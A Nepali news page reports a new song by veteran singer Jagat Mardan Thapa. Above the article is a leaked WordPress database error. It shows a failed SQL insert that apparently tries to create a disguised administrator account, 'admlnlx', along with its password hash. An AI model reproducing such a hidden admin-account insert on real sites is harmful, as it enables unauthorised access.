WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BX.EWJi.MSAcJTrreuTtoS1SIha0NY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:37:40', '', 'admlnlx', 'admlnlx')
गाउँले न्युज – काठमाडौं ,
मोहित मर्दन थापाको प्रस्तुतिमा वरिष्ठ गायक जगत मर्दन थापको नयाँ गीत ‘फूलमाया हेर्थिन मलाई…’ सार्वजनिक भएको छ । विवस वस्तीको शब्द रचना, मनोहर सुनामको एरेञ्ज, सङ्गीत र भोला पौडेलको मिक्सिङ/रेकर्डिङ रहेको गीतको लिरिकल भिडियो सार्वजनिक भएको हो । गीतको भिडियो भकारी एमडीसी मार्फत सार्वजनिक गरिएको छ ।
यो गीत जगत मर्दन थापाको केही समयअघि सार्वजनिक एल्वम ‘म मक्किएको धुरी खाँबो’ समावेस छ । गायक जगतमर्दन थापाले ८४ वर्षको उमेरमा गीति एल्बम ‘म मक्किएको धुरी खाँबो’ केही समयअघि सार्वजनिक गर्नुभएको थियो ।
‘माया लुकाई लुक्दैन…’, ‘कोइलीले सम्झाइदियो…’ जस्ता लोकप्रिय गीतका अग्रज स्रष्टा सङ्गीतकार तथा गायक जगतमर्दन थापाले ८४ वर्षको उमेरमा पनि नयाँ-नयाँ गीत स्रोता/दर्शकमाझ पस्किरहनु भएको छ । गायक थापाले केही समयअघि आधा दर्जन भन्दा बढी गीतको लाइभ प्रस्तुति पनि गर्नुभएको थियो ।